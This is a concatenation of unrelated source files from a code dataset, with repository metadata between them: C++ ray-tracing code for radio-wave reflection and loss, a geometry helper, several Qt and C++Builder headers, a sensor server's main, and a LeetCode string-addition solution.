nplanes_tempk++) { if (nplanes_tempk != nplanes_tempj) { fct_calimage(TX_j, planes, nplanes_tempk, TX_k); rflagk = fct_calrpt(TX_k, RX, planes, nplanes_tempk, Phitk); if (rflagk = true) { rflagjk = fct_calrpt(TX_j, Phitk, planes, nplanes_tempj, Phitjk); if (rflagjk == true) { rflagijk = fct_calrpt(TX_i, Phitjk, planes, cur_nplanes, Phitijk); if (rflagijk = true) { kd = npath3 * 15; npath3++; rpath3 = (float *)realloc((float *)rpath3, (npath3)* 15 * sizeof(float)); rpath3[0 + kd] = Phitijk[0]; rpath3[1 + kd] = Phitijk[1]; rpath3[2 + kd] = Phitijk[2]; rpath3[3 + kd] = (float)cur_nplanes; rpath3[4 + kd] = 1.0; rpath3[5 + kd] = Phitjk[0]; rpath3[6 + kd] = Phitjk[1]; rpath3[7 + kd] = Phitjk[2]; rpath3[8 + kd] = (float)nplanes_tempj; rpath3[9 + kd] = 1.0; rpath3[10 + kd] = Phitk[0]; rpath3[11 + kd] = Phitk[1]; rpath3[12 + kd] = Phitk[2]; rpath3[13 + kd] = (float)nplanes_tempk; rpath3[14 + kd] = 1.0; } } } } } } } } } } } npath = npath1 + npath2 + npath3 + 1; distance_mfct = new float[npath]; lossfac_mfct = new float[npath]; //direct path (no reflection) Thits0 = fct_caltpts(TX, RX, planes, nplanes, &tflag0, Phit_nt); nb_pts = 2 + tflag0;//产生交点的数目 path0 = new float[nb_pts * 5]; path0[0] = TX[0]; path0[1] = TX[1]; path0[2] = TX[2]; path0[3] = 0.0f; path0[4] = 0.0f; indice = (tflag0 + 1) * 5; for (int indice_i = 5; indice_i < indice; indice_i++) { path0[indice_i] = Thits0[indice_i - 5]; } path0[0 + indice] = RX[0]; path0[1 + indice] = RX[1]; path0[2 + indice] = RX[2]; path0[3 + indice] = 0.0f; path0[4 + indice] = 0.0f; compute_distloss(path0, nb_pts, planes, currentpath, distance_mfct, lossfac_mfct); delete[] Thits0; Thits0 = NULL; delete[] path0; path0 = NULL;//与free不同之处 //path with 1 reflection for (int npathi = 0; npathi < npath1; npathi++) { currentpath++; id = npathi * 5; Phiti[0] = rpath1[0 + id]; Phiti[1] = rpath1[1 + id]; Phiti[2] = rpath1[2 + id]; Thits11 = fct_caltpts(TX, Phiti, planes, nplanes, &tflag11, Phit_nt); Thits12 = fct_caltpts(Phiti, RX, planes, nplanes, &tflag12, Phit_nt); nb_pts = tflag11 + tflag12 + 3; path1 = new float[nb_pts * 5]; path1[0] = TX[0]; path1[1] = TX[1]; path1[2] = TX[2]; path1[3] = 0.0f; path1[4] = 0.0f; indice = (tflag11 + 1) * 5; for (int indice_j = 5; indice_j < indice; indice_j++) { path1[indice_j] = Thits11[indice_j - 5]; } path1[0 + indice] = Phiti[0]; path1[1 + indice] = Phiti[1]; path1[2 + indice] = Phiti[2]; path1[3 + indice] = rpath1[3+id]; path1[4 + indice] = rpath1[4+id]; ind = (tflag11 + 2) * 5; indice = (tflag11 + tflag12 + 2) * 5; for (int ind_j = ind; ind_j < indice; ind_j++) { path1[ind_j] = Thits12[ind_j - ind]; } path1[0 + indice] = RX[0]; path1[1 + indice] = RX[1]; path1[2 + indice] = RX[2]; path1[3 + indice] = 0.0f; path1[4 + indice] = 0.0f; //compute_distloss(path0, nb_pts, planes, currentpath, distance_mfct, lossfac_mfct); compute_distloss(path1, nb_pts, planes, currentpath, distance_mfct, lossfac_mfct); delete[] Thits11; Thits11 = NULL; delete[] Thits12; Thits12 = NULL; delete[] path1; path1 = NULL; } //path with 2 reflection for (int npath2i = 0; npath2i < npath2; npath2i++) { currentpath++; id = npath2i * 10; Phitij[0] = rpath2[0 + id]; Phitij[1] = rpath2[1 + id]; Phitij[2] = rpath2[2 + id]; Phitj[0] = rpath2[5 + id]; Phitj[1] = rpath2[6 + id]; Phitj[2] = rpath2[7 + id]; Thits21 = fct_caltpts(TX, Phitij, planes, nplanes, &tflag21, Phit_nt); Thits22 = fct_caltpts(Phitij, Phitj, planes, nplanes, &tflag22, Phit_nt); Thits23 = fct_caltpts(Phitj, RX, planes, nplanes, &tflag23, Phit_nt); nb_pts = tflag21 + tflag22 + tflag23 + 4; path2 = new float[nb_pts * 5]; path2[0] = TX[0]; path2[1] = TX[1]; path2[2] = TX[2]; path2[3] = 0.0f; path2[4] = 0.0f; indice = (tflag21 + 1) * 5; for (int indice_j = 5; indice_j < indice; indice_j++) { path2[indice_j] = Thits21[indice_j - 5]; } path2[0 + indice] = Phitij[0]; path2[1 + indice] = Phitij[1]; path2[2 + indice] = Phitij[2]; path2[3 + indice] = rpath2[3 + id]; path2[4 + indice] = rpath2[4 + id]; ind = (tflag21 + 2) * 5; indice = (tflag21 + tflag22 + 2) * 5; for (int indice_j = ind; indice_j < indice; indice_j++) { path2[indice_j] = Thits22[indice_j - ind]; } path2[0 + indice] = Phitj[0]; path2[1 + indice] = Phitj[1]; path2[2 + indice] = Phitj[2]; path2[3 + indice] = rpath2[8 + id]; path2[4 + indice] = rpath2[9 + id]; ind = (tflag21 + tflag22 + 3) * 5; indice = (tflag21 + tflag22 + tflag23 + 3) * 5; for (int indice_j = ind; indice_j < indice; indice_j++) { path2[indice_j] = Thits23[indice_j - ind]; } path2[0 + indice] = RX[0]; path2[1 + indice] = RX[1]; path2[2 + indice] = RX[2]; path2[3 + indice] = 0.0f; path2[4 + indice] = 0.0f; compute_distloss(path2, nb_pts, planes, currentpath, distance_mfct, lossfac_mfct); delete[] Thits21; Thits21 = NULL; delete[] Thits22; Thits22 = NULL; delete[] Thits23; Thits23 = NULL; delete[] path2; path2 = NULL; } //path with 3 reflection for (int npath3i = 0; npath3i < npath3; npath3i++) { currentpath++; id = npath3i * 15; Phitijk[0] = rpath3[0 + id]; Phitijk[1] = rpath3[1 + id]; Phitijk[2] = rpath3[2 + id]; Phitjk[0] = rpath3[5 + id]; Phitjk[1] = rpath3[6 + id]; Phitjk[2] = rpath3[7 + id]; Phitk[0] = rpath3[10 + id]; Phitk[1] = rpath3[11 + id]; Phitk[2] = rpath3[12 + id]; Thits31 = fct_caltpts(TX, Phitijk, planes, nplanes, &tflag31, Phit_nt); Thits32 = fct_caltpts(Phitijk, Phitjk, planes, nplanes, &tflag32, Phit_nt); Thits33 = fct_caltpts(Phitjk, Phitk, planes, nplanes, &tflag33, Phit_nt); Thits34 = fct_caltpts(Phitk, RX, planes, nplanes, &tflag34, Phit_nt); nb_pts = (tflag31 + tflag32 + tflag33 + tflag34 + 5); path3 = new float[nb_pts * 5]; path3[0] = TX[0]; path3[1] = TX[1]; path3[2] = TX[2]; path3[3] = 0.0f; path3[4] = 0.0f; indice = (tflag31 + 1) * 5; for (int indice_j = 5; indice_j < indice; indice_j++) { path3[indice_j] = Thits32[indice_j - 5]; } path3[0 + indice] = Phitijk[0]; path3[1 + indice] = Phitijk[1]; path3[2 + indice] = Phitijk[2]; path3[3 + indice] = rpath3[3 + id]; path3[4 + indice] = rpath3[4 + id]; ind = (tflag31 + tflag32 + 3) * 5; indice = (tflag31 + tflag32 + tflag33 + 3) * 5; for (int indice_j = ind; indice_j < indice; indice_j++) { path3[indice_j] = Thits33[indice_j - ind]; } path3[0 + indice] = Phitjk[0]; path3[1 + indice] = Phitjk[1]; path3[2 + indice] = Phitjk[2]; path3[3 + indice] = rpath3[8 + id]; path3[4 + indice] = rpath3[9 + id]; ind = (tflag31 + tflag32 + 3) * 5; indice = (tflag31 + tflag32 + tflag33 + 3) * 5; for (int indice_j = ind; indice_j < indice; indice_j++) { path3[indice_j] = Thits33[indice_j - ind]; } path3[0 + indice] = Phitk[0]; path3[1 + indice] = Phitk[1]; path3[2 + indice] = Phitk[2]; path3[3 + indice] = rpath3[13 + id]; path3[4 + indice] = rpath3[14 + id]; ind = (tflag31 + tflag32 + tflag33 + 4) * 5; indice = (tflag31 + tflag32 + tflag33 + tflag34 + 4) * 5; for (int indice_j = ind; indice_j < indice; indice_j++) { path3[indice_j] = Thits34[indice_j - ind]; } path3[0 + indice] = RX[0]; path3[1 + indice] = RX[1]; path3[2 + indice] = RX[2]; path3[3 + indice] = 0.0; path3[4 + indice] = 0.0; compute_distloss(path3, nb_pts, planes, currentpath, distance_mfct, lossfac_mfct); delete[] Thits31; Thits31 = NULL; delete[] Thits32; Thits32 = NULL; delete[] Thits33; Thits33 = NULL; delete[] Thits34; Thits34 = NULL; delete[] path3; path3 = NULL; } //compute final value temp = 0.0f; for (int temp_i = 0; temp_i < npath; temp_i++) { temp += (lossfac_mfct[temp_i] * lossfac_mfct[temp_i]); } rs_amp[n + ld] = sqrtf(temp); delete[] rpath1; rpath1 = NULL; delete[] rpath2; rpath2 = NULL; delete[] rpath3; rpath3 = NULL; if (nr == 0) { delete[] path1; delete[] path2; delete[] path3; path1 = path2 = path3 = NULL; } if (nr == 1) { delete[] path2; delete[] path3; path2 = path3 = NULL; } if (nr == 2) { delete[] path3; path3 = NULL; } delete[] distance_mfct; distance_mfct = NULL; delete[] lossfac_mfct; lossfac_mfct = NULL; } } delete[] TX_i; delete[] TX_j; delete[] TX_k; delete[] Phiti; delete[] Phitj; delete[] Phitij; delete[] Phitk; delete[] Phitjk; delete[] Phitijk; delete[] Phit_nt; delete[] TX; delete[] RX; } //get a reflection symmetry point void fct_calimage(float *TX0, float **planes, int i, float *TX_i) { register float t_imi, ux = planes[12][i], uy = planes[13][i], uz = planes[14][i]; register float TX0_x = TX0[0], TX0_y = TX0[1], TX0_z = TX0[2]; t_imi = -2.0f*(TX0_x*ux + TX0_y*uy + TX0_z*uz + planes[15][i]); TX_i[0] = TX0_x + ux*t_imi; TX_i[1] = TX0_y + uy*t_imi; TX_i[2] = TX0_z + uz*t_imi;//slove the symmetry point } bool fct_calrpt(float *P1, float *P2, float **planes, int i, float *Phit) { float ux = planes[12][i], uy = planes[13][i], uz = planes[14][i]; register float P1_x = P1[0], P1_y = P1[1], P1_z = P1[2]; float P1P2_x, P1P2_y, P1P2_z; //the coordinates of the receiving point and the virtual base station coordinate different P1P2_x = P2[0] - P1_x; P1P2_y = P2[1] - P1_y; P1P2_z = P2[2] - P1_z; //calculate the distance float ti_max = sqrtf(P1P2_x*P1P2_x + P1P2_y*P1P2_y + P1P2_z*P1P2_z);//虚像点和接收点之间的距离 float ti_maxtol = ti_max - t_tol; float cte,Rdx,Rdy,Rdz; float Vdp; float ti; if (ti_max > t_tol) { cte = 1.0f / ti_max; Rdx = P1P2_x*cte; Rdy = P1P2_y*cte; Rdz = P1P2_z*cte;//the cos value of the vector //dot product to get the angle //both vectors are normailizied, so the parament is the cosine of the angle//half correct half wrong Vdp = ux*Rdx + uy*Rdy + uz*Rdz; if (Vdp != 0.0)//not a vertical reflection { ti = -(ux*P1_x + uy*P1_y + uz*P1_z + planes[15][i]) / Vdp; if ((t_tol < ti) && (ti < ti_maxtol)) {//coordinate value of the reflection intersection point Phit[0] = P1_x + Rdx*ti; Phit[1] = P1_y + Rdy*ti; Phit[2] = P1_z + Rdz*ti; if ((planes[16][i] <= Phit[0]) && (Phit[0] <= planes[17][i]) && (planes[18][i] <= Phit[1]) && (Phit[1] <= planes[19][i]) && (planes[20][i] <= Phit[2]) && (Phit[2] <= planes[21][i])) return true; } } } return false; } float * fct_caltpts(float *P1, float *P2, float **planes, int nplanes, int *nthits, float *Phit_nt) { float P1_x = P1[0], P1_y = P1[1], P1_z = P1[2]; float P1P2_x, P1P2_y, P1P2_z,tmp,Rdx_nt,Rdy_nt,Rdz_nt,t_nt; float ux_nt, uy_nt, uz_nt, Vd_nt; int nt, number = 0, jd, id, i, ind;//ntd; float *result_caltpts=NULL; float *tab_pts = NULL, *sorted_tab_pts = NULL; int *index = NULL; bool alread_there = false; //the coordinates of the receiving point and the virtual base station coordinate different P1P2_x = P2[0] - P1_x; P1P2_y = P2[1] - P1_y; P1P2_z = P2[2] - P1_z; float tmax_nt = sqrtf(P1P2_x*P1P2_x + P1P2_y*P1P2_y + P1P2_z*P1P2_z); float tmax_ntol = tmax_nt - t_tol; if (tmax_nt > t_tol) { tmp = 1.0f / tmax_nt; Rdx_nt = P1P2_x*tmp; Rdy_nt = P1P2_y*tmp; Rdz_nt = P1P2_z*tmp; for (nt = 0; nt < nplanes; nt++) { //ntd = ux_nt = planes[12][nt]; uy_nt = planes[13][nt]; uz_nt = planes[14][nt]; Vd_nt = ux_nt*Rdx_nt + uy_nt*Rdy_nt + uz_nt*Rdz_nt; if (Vd_nt != 0.0f) { ////发射点到墙面第一个点的向量和墙面法向向量的内积除以上述余弦值 t_nt = -(ux_nt*P1_x + uy_nt*P1_y + uz_nt*P1_z + planes[15][nt]) / Vd_nt; if ((t_tol < t_nt) && (t_nt < tmax_ntol)) { Phit_nt[0] = P1_x + Rdx_nt*t_nt; Phit_nt[1] = P1_y + Rdy_nt*t_nt; Phit_nt[2] = P1_z + Rdz_nt*t_nt; //if ((planes[16][nt]<=Phit_nt[0])&&(Phit_nt[0]<=planes)) if ((planes[16][nt] <= Phit_nt[0]) && (Phit_nt[0] <= planes[17][nt]) && (planes[18][nt] <= Phit_nt[1]) && (Phit_nt[1] <= planes[19][nt]) && (planes[20][nt] <= Phit_nt[2]) && (Phit_nt[2] <= planes[21][nt])) { if (number==0) { jd = number * 6; number++; tab_pts = (float *)realloc((float *)tab_pts, (jd+ 6) * sizeof(float)); tab_pts[0 + jd] = Phit_nt[0]; tab_pts[1 + jd] = Phit_nt[1]; tab_pts[2 + jd] = Phit_nt[2]; tab_pts[3 + jd] = (float)nt; tab_pts[4 + jd] = 2.0; tab_pts[5 + jd] = t_nt; } else { alread_there = false; for (i = 0; i < number; i++) { id = 6 * i; if ((fabsf(tab_pts[0 + id] - Phit_nt[0]) < t_tol) && (fabsf(tab_pts[1 + id] - Phit_nt[1]) < t_tol) && (fabsf(tab_pts[2 + id] - Phit_nt[2]) < t_tol)) { alread_there = true; } } if (alread_there == false) { jd = number * 6; number++; tab_pts = (float *)realloc((float *)tab_pts, (jd+6) * sizeof(float)); tab_pts[0 + jd] = Phit_nt[0]; tab_pts[1 + jd] = Phit_nt[1]; tab_pts[2 + jd] = Phit_nt[2]; tab_pts[3 + jd] = (float)nt; tab_pts[4 + jd] = 2.0; tab_pts[5 + jd] = t_nt; } } } } } } if (number > 0) { sorted_tab_pts = new float[number]; index = new int[number]; for (i = 0; i < number;i++) { index[i] = i; sorted_tab_pts[i] = tab_pts[5 + i * 6]; } qsindex(sorted_tab_pts, index, 0, number - 1); result_caltpts = new float[5 * number]; for (i = 0; i < number; i++) { ind = 6 * index[i]; id = 5 * i; result_caltpts[0 + id] = tab_pts[0 + ind]; result_caltpts[1 + id] = tab_pts[1 + ind]; result_caltpts[2 + id] = tab_pts[2 + ind]; result_caltpts[3 + id] = tab_pts[3 + ind]; result_caltpts[4 + id] = tab_pts[4 + ind]; } } } delete[]tab_pts; delete[]sorted_tab_pts; delete[]index; nthits[0] = number; return result_caltpts; } void compute_distloss(float *path, int num_pts, float **planes, int currentpath, float *distance_distloss, float *lossfac) { //change parament float flp_scale = 100.0f; float fc = 1000000000;//Hz float material[] = { 0.0f, 0.0f, 0.0f, 0.0f, 5.0f, 0.04f }; float lossreal = 1.0f, lossimag = 0.0f, tmp1, tmp2, tmp; float Vd, vs, vs2; float x1, x2, y1, y2, x3, y3, x4, y4, x5, y5, r1, r2; float P1P2_x, P1P2_y, P1P2_z, uy, dj, loss_jreal, loss_jimag, epsreal, epsimag; int j, jd, flagP2, ind, ind2; float lambda, Ao, cte = 1.0f / flp_scale; lambda = c / fc; Ao = lambda / (4.0f*PI); distance_distloss[currentpath] = 0.0f; lossfac[currentpath] = 1.0f; for (j = 0; j < num_pts; j++) { jd = j * 5; P1P2_x = path[5 + jd] - path[0 + jd]; P1P2_y = path[6 + jd] - path[1 + jd]; P1P2_z = path[7 + jd] - path[2 + jd]; jd += 5; flagP2 = (int)path[4 + jd]; ind = (int)path[3 + jd]; //ind1=ind uy = planes[13][ind]; dj = sqrtf(P1P2_x*P1P2_x + P1P2_y*P1P2_y + P1P2_z*P1P2_z); loss_jreal = 1.0f; loss_jimag = 0.0f; if (flagP2 == 1) { epsreal = material[4]; epsimag = -60.0f*lambda*material[5]; tmp = 1.0f / dj; Vd = planes[12][ind] * P1P2_x*tmp + uy*P1P2_y*tmp + planes[14][ind] * P1P2_z*tmp; vs = fabsf(Vd); vs2 = vs*vs; x1 = epsreal - (1.0f - vs2); y1 = epsimag; r1 = sqrt(x1*x1 + y1*y1); x2 = sqrtf((r1 + x1)*0.5f); y2 = y1 / (2.0f*x2); if (fabsf(uy) > 0.5) { x3 = epsreal*vs - x2; y3 = epsimag*vs - y2; x4 = epsreal*vs + x2; y4 = epsimag*vs + y2; r2 = 1.0f / (x4*x4 + y4*y4); loss_jreal = (x3*x4 + y3*y4)*r2; loss_jimag = (y3*x4 - x3*y4)*r2; } else { x3 = vs - x2; y3 = -y2; x4 = vs + x2; y4 = y2; r2 = 1.0f / (x4*x4 + y4*y4); loss_jreal = (x3*x4 + y3*y4)*r2; loss_jimag = (y3*x4 - x3*y4)*r2; } } if ((flagP2 == 2)) { ind2 = ind * 6; epsreal = material[4]; epsimag = -60.0f*lambda*material[5]; tmp = 1.0f / dj; Vd = planes[12][ind] * P1P2_x*tmp + uy*P1P2_y*tmp + planes[14][ind] * P1P2_z*tmp; vs = fabsf(Vd); vs2 = vs*vs; x1 = epsreal - (1.0f - vs2); y1 = epsimag; r1 = sqrtf(x1*x1 + y1*y1); x2 = sqrtf((r1 + x1)*0.5f); y2 = y1 / (2.0f*x2); if (fabsf(uy) > 0.5f) { x3 = epsreal*vs - x2; y3 = epsimag*vs - y2; x4 = epsreal*vs + x2; y4 = epsimag*vs + y2; r2 = 1.0f / (x4*x4 + y4*y4); x5 = (x3*x4 + y3*y4)*r2; y5 = (y3*x4 - x3*y4)*r2; loss_jreal = sqrtf(loss_factor*(1.0f - (x5*x5 + y5*y5))); } else { x3 = vs - x2; y3 = -y2; x4 = vs + x2; y4 = y2; r2 = 1.0f / (x4*x4 + y4*y4); x5 = (x3*x4 + y3*y4)*r2; y5 = (y3*x4 - x3*y4)*r2; loss_jreal = sqrtf(loss_factor*(1.0f - (x5*x5 + y5*y5))); } } distance_distloss[currentpath] += dj; tmp1 = (lossreal*loss_jreal - lossimag*loss_jimag); tmp2 = (lossreal*loss_jimag + lossimag*loss_jreal); lossreal = tmp1; lossimag = tmp2; } lossfac[currentpath] = (Ao*sqrtf(lossreal*lossreal + lossimag*lossimag)) / (distance_distloss[currentpath] * cte); } void qsindex(float *a, int *index, int lo, int hi)//sort from small to large { // lo is the lower index, hi is the upper index of the region of array a that is to be sorted int i = lo, j = hi, ind; float x = a[(lo + hi) / 2], h; do { while (a[i] < x) i++; while (a[j] > x) j--; if (i <= j) { h = a[i]; a[i] = a[j]; a[j] = h; ind = index[i]; index[i] = index[j]; index[j] = ind; i++; j--; } } while (i<=j); /* recursion */ if (lo < j) qsindex(a, index, lo, j); if (i < hi) qsindex(a, index, i, hi); }
dada2d20a29c204f4464fd69c0001f00403d9161
ea33f6e1a551feed6b279941b203ac1bf5aa73dc
/HydroViscosity/HydroViscosity/Geometry.cpp
dca675ee9cacabf9ac2823bc5e7e594d63cde4e8
[]
no_license
eladtan/HydroViscosity
21d5533fb4050568772c90b5afe2c0e637ef43cf
b7b5a8674fd81ef310adeaf8b5aa8a9f8c0f0f64
refs/heads/master
2020-11-28T08:13:59.985453
2019-12-31T15:11:54
2019-12-31T15:11:54
229,753,412
0
0
null
null
null
null
UTF-8
C++
false
false
640
cpp
#include "Geometry.hpp" #define _USE_MATH_DEFINES #include <math.h> double Planar::CalcArea(std::vector<double> const& edges, size_t index) const { return 1.0; } double Planar::CalcVolume(std::vector<double> const& edges, size_t index) const { return edges[index + 1] - edges[index]; } double Spherical::CalcArea(std::vector<double> const& edges, size_t index) const { return 4 * M_PI * edges[index] * edges[index]; } double Spherical::CalcVolume(std::vector<double> const& edges, size_t index) const { return 4 * M_PI * (edges[index + 1] * edges[index + 1] * edges[index + 1] - edges[index] * edges[index] * edges[index]) / 3.0; }
67bfdd08201985673018bc3bc12f4c87da1eb306
72ba5ca7af64ba10441cb830222093973f714f4e
/Graphics For Games/6) Scene Graph/CubeRobot.h
8bf1044ad9afcca34acaf8f4e40593e835c98c7b
[]
no_license
templeblock/AdvancedGraphics
ef8f3ba4566b2e9197b0f13c8ddd4b88e811bf24
83884ce0880f14b6a5ca4ed0ebbd263c15340a74
refs/heads/master
2020-04-09T06:28:33.369261
2018-03-15T16:34:45
2018-03-15T16:34:45
null
0
0
null
null
null
null
UTF-8
C++
false
false
442
h
#pragma once #include "../../nclgl/SceneNode.h" #include "../../nclgl/OBJMesh.h" class CubeRobot : public SceneNode { public: CubeRobot(); ~CubeRobot(); virtual void Update(float msec); static void CreateCube() { OBJMesh*m = new OBJMesh(); m->LoadOBJMesh(MESHDIR"cube.obj"); cube = m; } static void DeleteCube() { delete cube; } protected : static Mesh* cube; SceneNode* head; SceneNode* leftArm; SceneNode* rightArm; };
2b4f337022d11b86b8010ee19b694e90333c6a60
4837ae201a0e295b32168eff7c350e1f39816ec2
/Main.h
1e37c1e0e5e8d2da9b81dc00bfdf75adee71a6bf
[]
no_license
andreyV512/candry
be3067d49e7fb510881c8cc671c4047cd2f74e87
6619008c8cd503df9c1456c7b4e093de9d1a7e9e
refs/heads/master
2021-05-03T05:54:10.771914
2018-02-07T08:36:06
2018-02-07T08:38:29
120,586,145
0
0
null
null
null
null
WINDOWS-1251
C++
false
false
5,327
h
//--------------------------------------------------------------------------- #ifndef MainH #define MainH //--------------------------------------------------------------------------- #include "RawStrobes.h" #include "Calcers.h" #include <Controls.hpp> #include <StdCtrls.hpp> #include <Forms.hpp> #include "Chart.hpp" #include "TeEngine.hpp" #include "TeeProcs.hpp" #include <ExtCtrls.hpp> #include <Menus.hpp> #include "Series.hpp" #include <ComCtrls.hpp> #include <windows.h> #include <IniFiles.hpp> #include <ImgList.hpp> #include <Dialogs.hpp> #include <AppEvnts.hpp> #include <DBCtrls.hpp> #include <ToolWin.hpp> #include "Password.h" #include "SettingsADC.h" #include "View.h" #include "Settings.h" #include "Manage.h" #include "WorkMode.h" #include "tubefile.h" #include "Drawing.h" #include "SMS.h" #include "Inverter.h" #include <Classes.hpp> #include "TestMode.h" //--------------------------------------------------------------------------- class TMainForm : public TForm { __published: // IDE-managed Components TButton *bTest; TButton *bWork; TButton *bView; TButton *bManage; TButton *bCancelWork; TMainMenu *MainMenu1; TMenuItem *menuJob; TMenuItem *menuTube; TMenuItem *menuSettings; TMenuItem *menuView; TMenuItem *menuTypeSize; TMenuItem *menuMeasures; TMenuItem *menuWork; TMenuItem *menuQuit; TMenuItem *menuDiagnostics; TMenuItem *menuTest; TMenuItem *menuSignalsState; TMenuItem *menuProtocol; TMenuItem *menuSaveTube; TMenuItem *menuLoadTube; TMenuItem *menuManagement; TMenuItem *menuTestAdvantech; TMenuItem *menuCrashForward; TMenuItem *menuColors; TMenuItem *menuTestSMSConnection; TGroupBox *gbThickness; TChart *ThicknessChart; TStatusBar *StatusBarBottom; TStatusBar *StatusBarTop; TCheckBox *cbInterruptView; TSaveDialog *SaveToFileDialog; TOpenDialog *OpenDialogFromFile; TLabeledEdit *eThicknessBorder1; TLabeledEdit *eThicknessBorder2; TPanel *pResult; TPanel *pLength; TPanel *pVelocity; TFlowPanel *FlowPanel; TStaticText *StaticText1; TComboBox *cbTypeSize; TStaticText *lMinGoodLength; TEdit *eMin_Good_Length; TMemo *Memo1; TBarSeries *Series3; TTimer *TimerZone; void __fastcall MainFormInit(TObject *Sender); // выравнивает объекты на форме, работает в начале работы и при Resize // стандартные функции void __fastcall FormCreate(TObject *Sender); void __fastcall FormDestroy(TObject *Sender); void __fastcall FormKeyPress(TObject *Sender, wchar_t &Key); // нажатие пунктов главного меню void __fastcall menuTypeSizeClick(TObject *Sender); void __fastcall menuMeasuresClick(TObject *Sender); void __fastcall menuQuitClick(TObject *Sender); void __fastcall menuSignalsStateClick(TObject *Sender); void __fastcall menuSaveTubeClick(TObject *Sender); void __fastcall menuLoadTubeClick(TObject *Sender); void __fastcall menuTestAdvantechClick(TObject *Sender); void __fastcall menuF1Click(TObject *Sender); void __fastcall menuProtocolClick(TObject *Sender); void __fastcall menuTestSMSConnectionClick(TObject *Sender); void __fastcall menuColorsClick(TObject *Sender); // нажатие кнопок на форме void __fastcall bTestClick(TObject *Sender); void __fastcall bViewClick(TObject *Sender); void __fastcall bWorkClick(TObject *Sender); void __fastcall bManageClick(TObject *Sender); void __fastcall cbTypeSizeSelect(TObject *Sender); void __fastcall bCancelWorkClick(TObject *Sender); void __fastcall gbThicknessClick(TObject *Sender); void __fastcall bGoodTubeClick(TObject *Sender); void __fastcall bClass2TubeClick(TObject *Sender); void __fastcall FormClose(TObject *Sender, TCloseAction &Action); void __fastcall TimerZoneTimer(TObject *Sender); private: // User declarations RawStrobes* rawStrobes; Calcers* calcers; int calcers_count; void pr(AnsiString _msg); std::vector<double>thickness; // настройки типоразмеров void LoadSettings(void); // читает настройки из ini файла, заполняет едиты, устанавли пороги, мертвые зоны TIniFile *ini; // ини файл с настройками void UpdateComboBox(); // обновляет ComboBox с типоразмерами (после добавления или удаления, в начале работы) // рабочий режим WorkThreadClass *workthread; // тред работы TestMode* testMode; // блокировка void SetControlsAble(bool state, TButton *exc1 = NULL, TMenuItem *exc2 = NULL, TButton *exc3 = NULL, TButton *exc4 = NULL ); // блокировать или разблокировать кнопки void PutSummaryResultOnChart(std::vector<double> thickness ); // рисует данные на графике bool test_timer; int TestZoneSize; bool bCancel; // _LAN10M8PCI *adcBoards; ADCBoards* adcboards; public: // User declarations __fastcall TMainForm(TComponent* Owner); void __fastcall ClearCharts(void); // очищает все графики bool work_result; }; //--------------------------------------------------------------------------- extern PACKAGE TMainForm *MainForm; //--------------------------------------------------------------------------- #endif
31a54d54570f25dba8e452f4c11243ca54324e3a
24eadb4ab159b7f4eecbe51ecaa8ffef2b1dc04d
/MazeApp/source/mainwindow.h
6c8038c4dfc3fdcdbfbbdddcda7fe52d90b6b7cb
[]
no_license
migamul/Umjetna-inteligencija
cdddcdc9250670b9925c6a70bda18a9737b8a44c
891287ee6cc4b203ff046b1376fa63b0be7f6934
refs/heads/master
2020-03-09T16:44:57.885403
2018-06-13T08:48:34
2018-06-13T08:48:34
128,893,020
0
0
null
null
null
null
UTF-8
C++
false
false
459
h
#ifndef MAINWINDOW_H #define MAINWINDOW_H #include <QMainWindow> #include "secondwindow.h" namespace Ui { class MainWindow; } class MainWindow : public QMainWindow { Q_OBJECT public: explicit MainWindow(QWidget *parent = 0); ~MainWindow(); private slots: void on_Solve_clicked(); void on_OpenFileMaze_clicked(); private: Ui::MainWindow *ui; SecondWindow *secWindow; }; #endif // MAINWINDOW_H
3e5c3810f9e5c5e95043b135c23940dffc134411
33c6737ac2c976e0a46c040b7de43f1235b314d9
/SensorServers/CustomSensorServers/BMP180SensorServer/main.cpp
9b2bbf0dc7b83237b10ed16c8406dfb50f3467ef
[]
no_license
Wierus/SensorsCollector
67744c5087e6ef7981cf7bbe9af259dd1631bf5c
859b75b6f9c9ddfb9e6cdefb540504d506f9138c
refs/heads/master
2021-01-21T14:16:55.889062
2017-10-02T17:40:39
2017-10-02T17:40:39
58,068,342
0
0
null
null
null
null
UTF-8
C++
false
false
922
cpp
#include <QCoreApplication> #include <QTextCodec> #include "BMP180SensorServer.h" // Кодировка сообщений #define TEXT_CODEC_NAME "UTF-8" int main(int argc, char *argv[]) { QTextCodec::setCodecForLocale(QTextCodec::codecForName(TEXT_CODEC_NAME)); if (argc <= 2) { qDebug("Not enough parameters."); qDebug("Usage:"); qDebug("%s LocalServerName OwnerUserName", argv[0]); qDebug("LocalServerName - name of local server (name of file /tmp/<LocalServerName>)"); qDebug("OwnerUserName - owner of local server (owner of file /tmp/<LocalServerName>)"); return -1; } QCoreApplication application(argc, argv); BMP180SensorServer sensor; if (!sensor.initializeLocalServer(argv[1], argv[2])) { qDebug("Program starting error."); return -1; } qDebug("Program started successfully."); return application.exec(); }
28f876f1c5e8971b1b07c3945528ddd3a935ed02
ac5eb7df8515fb92071f9e0f64d1cf6467f4042d
/C++/addStrings.cpp
f7d6090141a4924a374005445a913537331fd04c
[]
no_license
Litao439420999/LeetCodeAlgorithm
6ea8060d56953bff6c03c95cf6b94901fbfbe395
9aee4fa0ea211d28ff1e5d9b70597421f9562959
refs/heads/master
2023-07-08T06:17:20.310470
2021-08-08T08:12:23
2021-08-08T08:12:23
null
0
0
null
null
null
null
UTF-8
C++
false
false
1,549
cpp
/** * @File : addStrings.cpp * @Brief : 字符串相加 数学问题 * @Link : https://leetcode-cn.com/problems/add-strings/ * @Author : Wei Li * @Date : 2021-07-18 */ #include <iostream> #include <string> #include <algorithm> class Solution { public: std::string addStrings(std::string num1, std::string num2) { std::string output(""); std::reverse(num1.begin(), num1.end()); std::reverse(num2.begin(), num2.end()); int onelen = num1.length(), twolen = num2.length(); if (onelen <= twolen) { std::swap(num1, num2); std::swap(onelen, twolen); } int addbit = 0; for (int i = 0; i < twolen; ++i) { int cur_sum = (num1[i] - '0') + (num2[i] - '0') + addbit; output += std::to_string((cur_sum) % 10); addbit = cur_sum < 10 ? 0 : 1; } for (int i = twolen; i < onelen; ++i) { int cur_sum = (num1[i] - '0') + addbit; output += std::to_string((cur_sum) % 10); addbit = cur_sum < 10 ? 0 : 1; } if (addbit) { output += "1"; } std::reverse(output.begin(), output.end()); return output; } }; // ----------------------------- int main(int argc, char **argv) { std::string num1 = "99", num2 = "1"; Solution solution; auto sum_str = solution.addStrings(num1, num2); std::cout << "The solution of this problem is " << sum_str << std::endl; return 0; }
